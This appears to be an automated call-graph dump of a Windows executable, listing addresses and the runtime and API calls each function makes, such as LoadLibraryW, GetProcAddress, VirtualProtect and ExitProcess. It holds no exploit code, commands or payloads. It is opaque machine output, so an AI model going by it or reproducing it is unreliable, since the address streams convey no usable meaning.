7ff77239b9a5 76298->76299 76301 7ff77239b7d8 type_info::_name_internal_method 76298->76301 76306 7ff77239b8f6 76299->76306 76314 7ff772390950 94 API calls strrchr 76299->76314 76302 7ff77239b980 76301->76302 76303 7ff77239b966 76301->76303 76301->76306 76308 7ff77239c060 76302->76308 76313 7ff77239be30 94 API calls type_info::_name_internal_method 76303->76313 76306->76235 76307->76230 76309 7ff772398d00 _free_nolock 94 API calls 76308->76309 76310 7ff77239c09a Concurrency::details::_UnrealizedChore::_CancelViaToken memcpy_s 76309->76310 76311 7ff77239c285 76310->76311 76312 7ff77239b310 type_info::_name_internal_method 94 API calls 76310->76312 76311->76306 76312->76311 76313->76306 76314->76306 76346 7ff7723a77f0 76315->76346 76317 7ff7723a72f8 76317->76159 76318 7ff7723a77f0 _wcsupr_s 94 API calls 76321 7ff7723a72d0 76318->76321 76319 7ff7723a731f 76319->76317 76351 7ff7723905a0 94 API calls 2 library calls 76319->76351 76321->76317 76321->76318 76321->76319 76324 7ff7723a7315 76321->76324 76323 7ff7723a77f0 _wcsupr_s 94 API calls 76323->76321 76350 7ff7723a78c0 94 API calls _wcsupr_s 76324->76350 76326 7ff7723a737f _wcsupr_s 76352 7ff772390600 5 API calls _free_nolock 76326->76352 76329 7ff7723b4c45 76328->76329 76358 7ff7723b5c90 76329->76358 76332 7ff7723b4c62 76335 7ff7723b4c90 76332->76335 76370 7ff7723b51c0 76332->76370 76374 7ff7723b5170 76332->76374 76378 7ff7723b4840 76332->76378 76385 7ff7723b4e10 94 API calls 2 library calls 76332->76385 76386 7ff77238ad60 94 API calls _free_nolock 76332->76386 76336 7ff7723b4dd5 76335->76336 76387 7ff7723b4e10 94 API calls 2 library calls 76335->76387 76336->76160 76342->76164 76343->76154 76344->76160 76345->76162 76347 7ff7723a7834 76346->76347 76348 7ff7723a7250 76346->76348 76353 7ff7723a7700 76347->76353 76348->76321 76348->76323 76350->76319 76351->76326 76352->76317 76357 7ff772394600 39 API calls 76353->76357 76354 7ff7723a773d 76354->76348 76355 7ff7723a7728 76355->76354 76356 7ff772390690 _free_nolock 94 API calls 76355->76356 76356->76354 76357->76355 76359 7ff7723b51c0 94 API calls 76358->76359 76361 7ff7723b5ca8 76359->76361 76360 7ff7723b5d8b 76362 7ff7723b5dcf 76360->76362 76363 7ff7723b5d96 strrchr 76360->76363 76361->76360 76367 7ff7723b4c4f 76361->76367 76388 7ff7723ce570 94 API calls 2 library calls 76361->76388 76366 7ff7723b5170 94 API calls 76362->76366 76365 7ff77239b7a0 type_info::_name_internal_method 94 API calls 76363->76365 76365->76367 76368 7ff7723b5deb 76366->76368 76367->76332 76384 7ff7723b4e10 94 API calls 2 library calls 76367->76384 76369 7ff77239b7a0 type_info::_name_internal_method 94 API calls 76368->76369 76369->76367 76371 7ff7723b51f9 76370->76371 76372 7ff7723b51e8 76370->76372 76371->76332 76389 7ff7723b4ed0 76372->76389 76375 7ff7723b5198 76374->76375 76376 7ff7723b51ac 76374->76376 76377 7ff7723b4ed0 94 API calls 76375->76377 76376->76332 76377->76376 76380 7ff7723b486e 76378->76380 76379 7ff772398da0 task 94 API calls 76381 7ff7723b49ac 76379->76381 76380->76379 76399 7ff7723b5790 94 API calls type_info::_name_internal_method 76381->76399 76383 7ff7723b4ad7 76383->76332 76384->76332 76385->76332 76386->76332 76387->76336 76388->76361 76390 7ff7723b4eec 76389->76390 76391 7ff7723b4e10 94 API calls 76390->76391 76397 7ff7723b4f06 memcpy_s 76390->76397 76391->76397 76392 7ff7723b4790 94 API calls 76392->76397 76393 7ff7723b5023 76394 7ff7723b5039 76393->76394 76395 7ff7723b4e10 94 API calls 76393->76395 76394->76371 76395->76394 76396 7ff772390690 _free_nolock 94 API calls 76396->76397 76397->76392 76397->76393 76397->76394 76397->76396 76398 7ff772394600 39 API calls 76397->76398 76398->76397 76399->76383 76402 7ff7723a8b40 10 API calls 76400->76402 76401 7ff7723a6fda 76401->76138 76402->76401 76404 7ff7723a6f90 _mbsncpy_s 10 API calls 76403->76404 76405 7ff7723a704b 76404->76405 76405->75966 76406->75968 76408->75981 76410 7ff77245ab3e 76409->76410 76411 7ff77245ab43 76409->76411 76432 7ff7724597e0 6 API calls try_get_function 76410->76432 76415 7ff77245ab4b SetLastError 76411->76415 76433 7ff772459828 6 API calls try_get_function 76411->76433 76414 7ff77245ab66 76414->76415 76434 7ff77245921c 76414->76434 76415->75987 76419 7ff77245ab97 76443 7ff772459828 6 API calls try_get_function 76419->76443 76420 7ff77245ab87 76441 7ff772459828 6 API calls try_get_function 76420->76441 76423 7ff77245ab9f 76425 7ff77245aba3 76423->76425 76426 7ff77245abb5 76423->76426 76424 7ff77245ab8e 76442 7ff772459294 14 API calls 2 library calls 76424->76442 76444 7ff772459828 6 API calls try_get_function 76425->76444 76445 7ff77245a750 14 API calls _invalid_parameter_noinfo 76426->76445 76430 7ff77245abbd 76446 7ff772459294 14 API calls 2 library calls 76430->76446 76433->76414 76439 7ff77245922d wcsftime 76434->76439 76435 7ff77245927e 76437 7ff77244aef8 memcpy_s 13 API calls 76435->76437 76436 7ff772459262 RtlAllocateHeap 76438 7ff77245927c 76436->76438 76436->76439 76437->76438 76438->76419 76438->76420 76439->76435 76439->76436 76447 7ff77246addc EnterCriticalSection LeaveCriticalSection wcsftime 76439->76447 76441->76424 76442->76415 76443->76423 76444->76424 76445->76430 76446->76415 76447->76439 76450 7ff77239f707 wcsxfrm 76448->76450 76451 7ff77239f81e 76450->76451 76454 7ff77239f727 wcsxfrm 76450->76454 76457 7ff772390a70 94 API calls 2 library calls 76451->76457 76453 7ff77239f7f0 wcsxfrm 76453->75890 76454->76453 76458 7ff772390950 94 API calls strrchr 76454->76458 76455->75893 76456->75892 76457->76453 76458->76453 76460 7ff77244a9a4 76459->76460 76474 7ff77244aa57 memcpy_s 76459->76474 76461 7ff77244aa67 76460->76461 76463 7ff77244a9bb 76460->76463 76466 7ff77245ab1c _invalid_parameter_noinfo 14 API calls 76461->76466 76461->76474 76462 7ff77244aef8 memcpy_s 14 API calls 76464 7ff772385487 76462->76464 76481 7ff7724591ac EnterCriticalSection 76463->76481 76477 7ff77238dd30 76464->76477 76468 7ff77244aa83 76466->76468 76468->76474 76482 7ff77245a290 76468->76482 76474->76462 76474->76464 76478 7ff77238dd6f wcsxfrm 76477->76478 76479 7ff772382f8a 94 API calls 76478->76479 76480 7ff7723854b8 76479->76480 76480->75903 76483 7ff77245a2db 76482->76483 76487 7ff77245a29f wcsftime 76482->76487 76484 7ff77244aef8 memcpy_s 14 API calls 76483->76484 76486 7ff77245a2d9 76484->76486 76485 7ff77245a2c2 RtlAllocateHeap 76485->76486 76485->76487 76486->76474 76487->76483 76487->76485 76489 7ff77246addc EnterCriticalSection LeaveCriticalSection wcsftime 76487->76489 76489->76487 76490->75910 76491->75912 76493 7ff77239f8d7 76492->76493 76494 7ff77239fb0b wcsxfrm 76493->76494 76498 7ff77239f8fa wcsxfrm 76493->76498 76500 7ff77239fb09 wcsxfrm 76493->76500 76496 7ff77239fb36 76494->76496 76494->76500 76517 7ff772390a70 94 API calls 2 library calls 76496->76517 76499 7ff77239f941 wcsxfrm 76498->76499 76498->76500 76501 7ff77239fa0d wcsxfrm 76498->76501 76499->75745 76500->76499 76518 7ff772390950 94 API calls strrchr 76500->76518 76501->76499 76502 7ff77239fa6d 76501->76502 76505 7ff77239fa81 76501->76505 76515 7ff772390950 94 API calls strrchr 76502->76515 76504 7ff77239fa7f 76509 7ff77239d290 76504->76509 76505->76504 76516 7ff772390950 94 API calls strrchr 76505->76516 76508->75746 76510 7ff77239d2b2 wcsxfrm 76509->76510 76514 7ff77239d321 wcsxfrm 76510->76514 76519 7ff77239e560 76510->76519 76512 7ff77239d30d 76523 7ff77239d720 94 API calls 2 library calls 76512->76523 76514->76499 76515->76504 76516->76504 76517->76499 76518->76499 76520 7ff77239e592 wcsxfrm 76519->76520 76524 7ff77239caf0 76520->76524 76522 7ff77239e691 _handle_error 76522->76512 76523->76514 76525 7ff77239cb4b 76524->76525 76537 7ff77239cbba wcsxfrm 76524->76537 76526 7ff77239cb6a 76525->76526 76541 7ff772390950 94 API calls strrchr 76525->76541 76528 7ff77239cc29 76526->76528 76531 7ff77239cb89 76526->76531 76530 7ff772398d00 _free_nolock 94 API calls 76528->76530 76530->76537 76533 7ff772398d00 _free_nolock 94 API calls 76531->76533 76532 7ff77239cec5 wcsxfrm 76532->76522 76533->76537 76534 7ff77239cde6 76536 7ff772398d00 _free_nolock 94 API calls 76534->76536 76539 7ff77239ce28 wcsxfrm 76534->76539 76536->76539 76540 7ff77239ccde wcsxfrm 76537->76540 76542 7ff77239de50 94 API calls 2 library calls 76537->76542 76539->76532 76544 7ff77239d720 94 API calls 2 library calls 76539->76544 76540->76534 76540->76539 76543 7ff77239d5c0 94 API calls wcsxfrm 76540->76543 76541->76526 76542->76540 76543->76540 76544->76539 76545->75755 76546->75762 76550 7ff77240f080 76547->76550 76551 7ff77240f0ed 76550->76551 76554 7ff77240f094 76550->76554 76552 7ff77240f0f8 FreeLibrary 76551->76552 76553 7ff77240ee23 76551->76553 76552->76553 76553->75577 76554->76553 76555 7ff77240f0cb FreeLibrary 76554->76555 76555->76554 76557 7ff772398d00 _free_nolock 94 API calls 76556->76557 76558 7ff77238ad2f 76557->76558 76558->75586 76560 7ff772390950 94 API calls strrchr 76558->76560 76559->75583 76560->75586 76562 7ff772393cbf 76561->76562 76563 7ff772393d67 76561->76563 76573 7ff772392320 94 API calls _free_nolock 76562->76573 76574 7ff772392320 94 API calls _free_nolock 76563->76574 76566 7ff77239310f 76566->75593 76566->75594 76569 7ff7723a4020 76567->76569 76568 7ff772383037 _mbsncpy_s 94 API calls 76568->76569 76569->76568 76570 7ff7723a4089 76569->76570 76570->75596 76571->75601 76572->75601 76573->76566 76574->76566 76575 7ff77239c690 76576 7ff77239dff0 wcsxfrm 94 API calls 76575->76576 76577 7ff77239c6bd wcsxfrm 76576->76577 76578 7ff7723c7930 76583 7ff77238fb80 94 API calls 5 library calls 76578->76583 76580 7ff7723c794e 76584 7ff7724555c4 76580->76584 76582 7ff7723c795d 76583->76580 76612 7ff772431ab8 76584->76612 76587 7ff772455608 76589 7ff77245562b 76587->76589 76590 7ff77245560d 76587->76590 76588 7ff7724556ea 76618 7ff772458b34 9 API calls _invalid_parameter_noinfo 76588->76618 76595 7ff77244aef8 memcpy_s 14 API calls 76589->76595 76604 7ff772455621 76589->76604 76590->76604 76615 7ff772460d88 31 API calls 3 library calls 76590->76615 76596 7ff772455650 76595->76596 76597 7ff77244aef8 memcpy_s 14 API calls 76596->76597 76599 7ff772455657 76597->76599 76598 7ff772455699 _handle_error 76598->76582 76600 7ff77245567c 76599->76600 76601 7ff772455673 76599->76601 76602 7ff77244aef8 memcpy_s 14 API calls 76600->76602 76603 7ff77244aef8 memcpy_s 14 API calls 76601->76603 76605 7ff772455681 76602->76605 76603->76604 76617 7ff772459294 14 API calls 2 library calls 76604->76617 76606 7ff77245569e 76605->76606 76607 7ff77244aef8 memcpy_s 14 API calls 76605->76607 76608 7ff77244aef8 memcpy_s 14 API calls 76606->76608 76609 7ff77245568b 76607->76609 76608->76604 76609->76606 76610 7ff772455690 76609->76610 76616 7ff772459294 14 API calls 2 library calls 76610->76616 76619 7ff772431748 76612->76619 76614 7ff772431ad2 76614->76587 76614->76588 76615->76604 76616->76598 76617->76598 76651 7ff7724591ac EnterCriticalSection 76619->76651 76621 7ff772431774 76622 7ff77243177c 76621->76622 76624 7ff77243179f 76621->76624 76623 7ff77244aef8 memcpy_s 14 API calls 76622->76623 76625 7ff772431781 76623->76625 76626 7ff77243189c 41 API calls 76624->76626 76627 7ff772458b14 _invalid_parameter_noinfo 23 API calls 76625->76627 76631 7ff7724317a7 _CreateFrameInfo 76626->76631 76628 7ff77243178d 76627->76628 76629 7ff772459200 _isindst LeaveCriticalSection 76628->76629 76630 7ff772431807 76629->76630 76630->76614 76631->76628 76632 7ff7724317e3 76631->76632 76633 7ff7724317d3 76631->76633 76635 7ff772458840 __std_exception_copy 23 API calls 76632->76635 76634 7ff77244aef8 memcpy_s 14 API calls 76633->76634 76634->76628 76636 7ff7724317f1 76635->76636 76636->76628 76637 7ff772431824 76636->76637 76638 7ff772458b34 _invalid_parameter_noinfo 9 API calls 76637->76638 76639 7ff772431838 fwprintf 76638->76639 76640 7ff77243184a 76639->76640 76643 7ff772431874 76639->76643 76641 7ff77244aef8 memcpy_s 14 API calls 76640->76641 76642 7ff77243184f 76641->76642 76644 7ff772458b14 _invalid_parameter_noinfo 23 API calls 76642->76644 76645 7ff7724591ac _isindst EnterCriticalSection 76643->76645 76646 7ff77243185a 76644->76646 76647 7ff77243187e 76645->76647 76646->76614 76648 7ff77243189c 41 API calls 76647->76648 76649 7ff772431887 76648->76649 76650 7ff772459200 _isindst LeaveCriticalSection 76649->76650 76650->76646 76652 7ff7723821fc 76653 7ff77238221f 76652->76653 76654 7ff77239f8b0 wcsxfrm 94 API calls 76653->76654 76655 7ff772383283 76654->76655 76657 7ff7723832a9 76655->76657 76658 7ff77239fbf0 94 API calls 2 library calls 76655->76658 76658->76655 76659 7ff772381d44 76660 7ff772381d62 76659->76660 76661 7ff77239c5a0 wcsxfrm 94 API calls 76660->76661 76661->76660 76662 7ff7723a56dc 76673 7ff7723eb100 76662->76673 76665 7ff7723daa90 94 API calls 76667 7ff7723a583b 76665->76667 76666 7ff7723a597e 76667->76666 76678 7ff7723fee70 94 API calls 2 library calls 76667->76678 76669 7ff7723a589d 76669->76666 76670 7ff77239b7a0 type_info::_name_internal_method 94 API calls 76669->76670 76671 7ff7723a58e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 76670->76671 76679 7ff7723ff070 94 API calls _wcsupr_s 76671->76679 76680 7ff7723dab10 76673->76680 76675 7ff7723dab10 94 API calls 76677 7ff7723a5725 76675->76677 76676 7ff7723eb138 76676->76675 76677->76665 76678->76669 76679->76666 76681 7ff7723dab81 76680->76681 76682 7ff7723dab2a 76680->76682 76687 7ff7723dabbc 76681->76687 76689 7ff7723dabd2 76681->76689 76683 7ff7723dab4e 76682->76683 76684 7ff7723dab3d 76682->76684 76696 7ff7723dade0 VirtualProtect 76683->76696 76685 7ff7723daee0 94 API calls 76684->76685 76691 7ff7723dab4c 76685->76691 76688 7ff7723daee0 94 API calls 76687->76688 76688->76691 76690 7ff7723dade0 VirtualProtect 76689->76690 76689->76691 76693 7ff7723dac1f 76690->76693 76691->76676 76693->76691 76699 7ff7723dae40 94 API calls 2 library calls 76693->76699 76697 7ff7723dab67 76696->76697 76697->76691 76698 7ff7723dae40 94 API calls 2 library calls 76697->76698 76698->76691 76699->76691 76700 7ff772384a01 76701 7ff772384a0c 76700->76701 76704 7ff772384a30 76700->76704 76701->76704 76705 7ff772392dc0 76701->76705 76719 7ff7723a40a0 96 API calls memcpy_s 76704->76719 76706 7ff77244aef8 memcpy_s 14 API calls 76705->76706 76707 7ff772392dd3 GetLastError 76706->76707 76708 7ff772392e77 76707->76708 76709 7ff772392ee6 76708->76709 76710 7ff7723a3fc0 94 API calls 76708->76710 76715 7ff772392f35 wcsxfrm 76709->76715 76720 7ff772393a80 98 API calls _handle_error 76709->76720 76710->76709 76711 7ff772393074 76714 7ff77244aef8 memcpy_s 14 API calls 76711->76714 76713 7ff772393005 76713->76711 76722 7ff772393a80 98 API calls _handle_error 76713->76722 76716 7ff772393079 SetLastError 76714->76716 76715->76713 76721 7ff772393a80 98 API calls _handle_error 76715->76721 76716->76704 76719->76704 76720->76715 76721->76713 76722->76711 76723 7ff77244ac60 76724 7ff77244ac7d GetModuleHandleW 76723->76724 76725 7ff77244acc7 76723->76725 76724->76725 76730 7ff77244ac8a 76724->76730 76733 7ff77244ab58 76725->76733 76728 7ff77244ad09 76730->76725 76747 7ff77244ad68 GetModuleHandleExW 76730->76747 76731 7ff77244ad1b 76753 7ff7724591ac EnterCriticalSection 76733->76753 76735 7ff77244ab74 76736 7ff77244ab90 25 API calls 76735->76736 76737 7ff77244ab7d 76736->76737 76738 7ff772459200 _isindst LeaveCriticalSection 76737->76738 76739 7ff77244ab85 76738->76739 76739->76728 76740 7ff77244ad1c 76739->76740 76754 7ff77245d484 76740->76754 76743 7ff77244ad56 76745 7ff77244ad68 3 API calls 76743->76745 76744 7ff77244ad45 GetCurrentProcess TerminateProcess 76744->76743 76746 7ff77244ad5d ExitProcess 76745->76746 76748 7ff77244adad 76747->76748 76749 7ff77244ad8e GetProcAddress 76747->76749 76751 7ff77244adbd 76748->76751 76752 7ff77244adb7 FreeLibrary 76748->76752 76749->76748 76750 7ff77244ada5 76749->76750 76750->76748 76751->76725 76752->76751 76755 7ff77244ad29 76754->76755 76756 7ff77245d4a2 76754->76756 76755->76743 76755->76744 76758 7ff772459550 76756->76758 76761 7ff772459378 76758->76761 76762 7ff7724593d9 76761->76762 76769 7ff7724593d4 try_get_function 76761->76769 76762->76755 76763 7ff7724594bc 76763->76762 76766 7ff7724594ca GetProcAddress 76763->76766 76764 7ff772459408 LoadLibraryW 76765 7ff772459429 GetLastError 76764->76765 76764->76769 76765->76769 76767 7ff7724594db 76766->76767 76767->76762 76768 7ff7724594a1 FreeLibrary 76768->76769 76769->76762 76769->76763 76769->76764 76769->76768 76770 7ff772459463 LoadLibraryExW 76769->76770 76770->76769 76771 7ff772381a21 76774 7ff77239fd90 76771->76774 76773 7ff772381a47 76777 7ff77239fdb8 76774->76777 76775 7ff77239feb0 wcsxfrm 76780 7ff77239ff71 wcsxfrm _mbsncpy_s 76775->76780 76801 7ff772390a70 94 API calls 2 library calls 76775->76801 76777->76775 76777->76780 76781 7ff7723a02a6 76777->76781 76794 7ff77239f2a0 76777->76794 76798 7ff77239f2f0 76777->76798 76802 7ff772390950 94 API calls strrchr 76777->76802 76780->76773 76782 7ff7723a02b7 76781->76782 76785 7ff7723a02fd 76781->76785 76803 7ff7723be9c0 94 API calls 76782->76803 76786 7ff7723a037d 76785->76786 76792 7ff7723a0333 76785->76792 76787 7ff7723a0383 76786->76787 76788 7ff7723a0396 76786->76788 76805 7ff7723b1a40 94 API calls 2 library calls 76787->76805 76806 7ff7723d2fe0 94 API calls type_info::_name_internal_method 76788->76806 76789 7ff7723a02f8 76789->76773 76804 7ff7723be9c0 94 API calls 76792->76804 76795 7ff77239f2c7 76794->76795 76797 7ff77239f2d5 76794->76797 76807 7ff7723be3f0 94 API calls 3 library calls 76795->76807 76797->76777 76799 7ff77239b7a0 type_info::_name_internal_method 94 API calls 76798->76799 76800 7ff77239f32a 76799->76800 76800->76777 76801->76780 76802->76777 76803->76789 76804->76789 76805->76789 76806->76789 76807->76797 76808 7ff77242d4e4 76835 7ff77242d6a8 76808->76835 76811 7ff77242d630 76866 7ff77242d9d4 7 API calls 2 library calls 76811->76866 76812 7ff77242d500 __scrt_acquire_startup_lock 76814 7ff77242d63a 76812->76814 76815 7ff77242d51e 76812->76815 76867 7ff77242d9d4 7 API calls 2 library calls 76814->76867 76825 7ff77242d560 __scrt_release_startup_lock 76815->76825 76843 7ff77245675c 76815->76843 76817 7ff77242d645 __CxxCallCatchBlock _free_nolock 76820 7ff77242d543 76822 7ff77242d5c9 76851 7ff77242db20 76822->76851 76824 7ff77242d5ce 76854 7ff772456688 76824->76854 76825->76822 76863 7ff77244adf8 26 API calls 76825->76863 76833 7ff77242d5f1 76833->76817 76865 7ff77242d83c 7 API calls __scrt_initialize_crt 76833->76865 76834 7ff77242d608 76834->76820 76868 7ff77242dc9c 76835->76868 76838 7ff77242d6d7 76870 7ff772458760 76838->76870 76839 7ff77242d4f8 76839->76811 76839->76812 76845 7ff77245676f 76843->76845 76844 7ff77242d53f 76844->76820 76847 7ff7724566f8 76844->76847 76845->76844 77050 7ff77242d400 76845->77050 76848 7ff77245672d 76847->76848 76849 7ff772456747 76847->76849 76848->76849 77132 7ff77242d4c8 76848->77132 76849->76825 77141 7ff77242e110 76851->77141 76853 7ff77242db37 GetStartupInfoW 76853->76824 76855 7ff77246695c 37 API calls 76854->76855 76856 7ff772456697 76855->76856 76857 7ff77242d5d6 76856->76857 77143 7ff772466c94 26 API calls wcsftime 76856->77143 76859 7ff7723850e0 76857->76859 76860 7ff7723850fd 76859->76860 77144 7ff772386b70 76860->77144 76863->76822 76864 7ff77242db64 GetModuleHandleW 76864->76833 76865->76834 76866->76814 76867->76817 76869 7ff77242d6ca __scrt_dllmain_crt_thread_attach 76868->76869 76869->76838 76869->76839 76871 7ff77246ad18 76870->76871 76872 7ff77242d6dc 76871->76872 76876 7ff77246695c 76871->76876 76882 7ff7724668a4 76871->76882 76872->76839 76875 7ff77242f154 7 API calls 2 library calls 76872->76875 76875->76839 76877 7ff772466969 76876->76877 76881 7ff7724669ae 76876->76881 76897 7ff77245aa74 76877->76897 76881->76871 76883 7ff7724668c7 76882->76883 76885 7ff7724668d1 76883->76885 77049 7ff7724591ac EnterCriticalSection 76883->77049 76887 7ff772466943 76885->76887 76889 7ff7724587cc __CxxCallCatchBlock 26 API calls 76885->76889 76887->76871 76891 7ff77246695b 76889->76891 76892 7ff7724669ae 76891->76892 76894 7ff77245aa74 26 API calls 76891->76894 76892->76871 76895 7ff772466998 76894->76895 76896 7ff7724666e4 37 API calls 76895->76896 76896->76892 76898 7ff77245aa85 76897->76898 76899 7ff77245aa8a 76897->76899 76940 7ff7724597e0 6 API calls try_get_function 76898->76940 76905 7ff77245aa92 76899->76905 76941 7ff772459828 6 API calls try_get_function 76899->76941 76902 7ff77245aaa9 76903 7ff77245921c _invalid_parameter_noinfo 14 API calls 76902->76903 76902->76905 76906 7ff77245aabc 76903->76906 76910 7ff77245ab0c 76905->76910 76948 7ff7724587cc 76905->76948 76908 7ff77245aada 76906->76908 76909 7ff77245aaca 76906->76909 76944 7ff772459828 6 API calls try_get_function 76908->76944 76942 7ff772459828 6 API calls try_get_function 76909->76942 76922 7ff7724666e4 76910->76922 76913 7ff77245aae2 76914 7ff77245aaf8 76913->76914 76915 7ff77245aae6 76913->76915 76946 7ff77245a750 14 API calls _invalid_parameter_noinfo 76914->76946 76945 7ff772459828 6 API calls try_get_function 76915->76945 76919 7ff77245ab00 76947 7ff772459294 14 API calls 2 library calls 76919->76947 76920 7ff77245aad1 76943 7ff772459294 14 API calls 2 library calls 76920->76943 76923 7ff7724668a4 37 API calls 76922->76923 76924 7ff77246670d 76923->76924 76960 7ff7724663f0 76924->76960 76927 7ff772466727 76927->76881 76928 7ff77245a290 wcsftime 15 API calls 76931 7ff772466738 76928->76931 76929 7ff7724667d3 76976 7ff772459294 14 API calls 2 library calls 76929->76976 76931->76929 76967 7ff7724669d8 76931->76967 76933 7ff7724667c7 76934 7ff7724667ce 76933->76934 76937 7ff7724667f3 76933->76937 76935 7ff77244aef8 memcpy_s 14 API calls 76934->76935 76935->76929 76936 7ff772466830 76936->76929 76978 7ff772466234 23 API calls 4 library calls 76936->76978 76937->76936 76977 7ff772459294 14 API calls 2 library calls 76937->76977 76941->76902 76942->76920 76943->76905 76944->76913 76945->76920 76946->76919 76947->76905 76957 7ff77244a6c0 EnterCriticalSection LeaveCriticalSection __CxxCallCatchBlock 76948->76957 76950 7ff7724587d5 76951 7ff7724587e4 76950->76951 76958 7ff77244a710 26 API calls 5 library calls 76950->76958 76953 7ff7724587ed IsProcessorFeaturePresent 76951->76953 76956 7ff772458817 __CxxCallCatchBlock 76951->76956 76954 7ff7724587fc 76953->76954 76959 7ff772458900 6 API calls 3 library calls 76954->76959 76957->76950 76958->76951 76959->76956 76961 7ff772433ea8 wcsftime 26 API calls 76960->76961 76962 7ff772466404 76961->76962 76963 7ff772466410 GetOEMCP 76962->76963 76964 7ff772466422 76962->76964 76966 7ff772466437 76963->76966 76965 7ff772466427 GetACP 76964->76965 76964->76966 76965->76966 76966->76927 76966->76928 76968 7ff7724663f0 28 API calls 76967->76968 76969 7ff772466a03 76968->76969 76970 7ff772466a40 IsValidCodePage 76969->76970 76973 7ff772466a83 memcpy_s _handle_error 76969->76973 76971 7ff772466a51 76970->76971 76970->76973 76972 7ff772466a88 GetCPInfo 76971->76972 76975 7ff772466a5a memcpy_s 76971->76975 76972->76973 76972->76975 76973->76933 76979 7ff772466500 76975->76979 76976->76927 76977->76936 76978->76929 76980 7ff77246653d GetCPInfo 76979->76980 76981 7ff772466633 _handle_error 76979->76981 76980->76981 76985 7ff772466550 76980->76985 76981->76973 76983 7ff7724665c7 77001 7ff77246e6ec 76983->77001 76988 7ff7724692ec 76985->76988 76987 7ff77246e6ec 31 API calls 76987->76981 76989 7ff772433ea8 wcsftime 26 API calls 76988->76989 76990 7ff77246932e 76989->76990 77006 7ff772462ff4 76990->77006 76992 7ff772469364 76993 7ff77245a290 wcsftime 15 API calls 76992->76993 76994 7ff77246936b _handle_error 76992->76994 76995 7ff772469390 memcpy_s wcsftime 76992->76995 76993->76995 76994->76983 76996 7ff772469428 76995->76996 76997 7ff772462ff4 _Wcsftime MultiByteToWideChar 76995->76997 76996->76994 76999 7ff772459294 __free_lconv_mon 14 API calls 76996->76999 76998 7ff77246940a 76997->76998 76998->76996 77000 7ff77246940e GetStringTypeW 76998->77000 76999->76994 77000->76996 77002 7ff772433ea8 wcsftime 26 API calls 77001->77002 77003 7ff77246e711 77002->77003 77009 7ff77246e3d4 77003->77009 77005 7ff7724665fa 77005->76987 77007 7ff772462ffc MultiByteToWideChar 77006->77007 77010 7ff77246e416 77009->77010 77011 7ff772462ff4 _Wcsftime MultiByteToWideChar 77010->77011 77013 7ff77246e460 77011->77013 77012 7ff77246e69f _handle_error 77012->77005 77013->77012 77014 7ff77245a290 wcsftime 15 API calls 77013->77014 77016 7ff77246e493 wcsftime 77013->77016 77014->77016 77015 7ff772462ff4 _Wcsftime MultiByteToWideChar 77017 7ff77246e505 77015->77017 77016->77015 77018 7ff77246e597 77016->77018 77017->77018 77035 7ff772459bf4 77017->77035 77018->77012 77047 7ff772459294 14 API calls 2 library calls 77018->77047 77022 7ff77246e5a6 77025 7ff77245a290 wcsftime 15 API calls 77022->77025 77027 7ff77246e5c0 wcsftime 77022->77027 77023 7ff77246e554 77023->77018 77024 7ff772459bf4 __crtLCMapStringW 7 API calls 77023->77024 77024->77018 77025->77027 77026 7ff772459bf4 __crtLCMapStringW 7 API calls 77029 7ff77246e641 77026->77029 77027->77018 77027->77026 77028 7ff77246e676 77028->77018 77046 7ff772459294 14 API calls 2 library calls 77028->77046 77029->77028 77043 7ff772463050 77029->77043 77036 7ff772459378 try_get_function 5 API calls 77035->77036 77037 7ff772459c32 77036->77037 77038 7ff772459c37 LCMapStringEx 77037->77038 77039 7ff772459c89 77037->77039 77040 7ff772459cbb 77038->77040 77048 7ff772459cd0 5 API calls 2 library calls 77039->77048 77040->77018 77040->77022 77040->77023 77042 7ff772459c93 LCMapStringW 77042->77040 77044 7ff772463073 WideCharToMultiByte 77043->77044 77046->77018 77047->77012 77048->77042 77051 7ff77242d410 77050->77051 77067 7ff7724567cc 77051->77067 77053 7ff77242d41c 77073 7ff77242d6f4 77053->77073 77056 7ff77242d434 _RTC_Initialize 77065 7ff77242d489 77056->77065 77078 7ff77242d8a4 77056->77078 77057 7ff77242d4b5 77057->76845 77059 7ff77242d449 77081 7ff772455f54 77059->77081 77063 7ff77242d45e 77064 7ff772456e98 26 API calls 77063->77064 77064->77065 77066 7ff77242d4a5 77065->77066 77114 7ff77242d9d4 7 API calls 2 library calls 77065->77114 77066->76845 77068 7ff7724567dd 77067->77068 77069 7ff7724567e5 77068->77069 77070 7ff77244aef8 memcpy_s 14 API calls 77068->77070 77069->77053 77071 7ff7724567f4 77070->77071 77115 7ff772458b14 23 API calls _invalid_parameter_noinfo 77071->77115 77074 7ff77242d705 77073->77074 77077 7ff77242d70a __scrt_release_startup_lock 77073->77077 77074->77077 77116 7ff77242d9d4 7 API calls 2 library calls 77074->77116 77076 7ff77242d77e 77077->77056 77117 7ff77242d868 77078->77117 77080 7ff77242d8ad 77080->77059 77082 7ff77242d455 77081->77082 77083 7ff772455f74 77081->77083 77082->77065 77113 7ff77242d97c InitializeSListHead 77082->77113 77084 7ff772455f7c 77083->77084 77085 7ff772455f92 77083->77085 77087 7ff77244aef8 memcpy_s 14 API calls 77084->77087 77086 7ff77246695c 37 API calls 77085->77086 77088 7ff772455f97 77086->77088 77089 7ff772455f81 77087->77089 77123 7ff772466114 30 API calls 3 library calls 77088->77123 77122 7ff772458b14 23 API calls _invalid_parameter_noinfo 77089->77122 77092 7ff772455fae 77124 7ff772455d34 26 API calls 77092->77124 77094 7ff772455feb 77125 7ff772455ef4 14 API calls 2 library calls 77094->77125 77096 7ff772456001 77097 7ff772456009 77096->77097 77098 7ff772456021 77096->77098 77100 7ff77244aef8 memcpy_s 14 API calls 77097->77100 77127 7ff772455d34 26 API calls 77098->77127 77101 7ff77245600e 77100->77101 77126 7ff772459294 14 API calls 2 library calls 77101->77126 77103 7ff77245601c 77103->77082 77105 7ff77245603d 77106 7ff77245606f 77105->77106 77108 7ff772456088 77105->77108 77111 7ff772456043 77105->77111 77128 7ff772459294 14 API calls 2 library calls 77106->77128 77108->77108 77130 7ff772459294 14 API calls 2 library calls 77108->77130 77109 7ff772456078 77129 7ff772459294 14 API calls 2 library calls 77109->77129 77131 7ff772459294 14 API calls 2 library calls 77111->77131 77114->77057 77115->77069 77116->77076 77118 7ff77242d87b 77117->77118 77119 7ff77242d882 77117->77119 77118->77080 77121 7ff7724585ec 26 API calls 77119->77121 77121->77118 77122->77082 77123->77092 77124->77094 77125->77096 77126->77103 77127->77105 77128->77109 77129->77103 77130->77111 77131->77082 77140 7ff77242dbb8 SetUnhandledExceptionFilter 77132->77140 77142 7ff77242e0f0 77141->77142 77142->76853 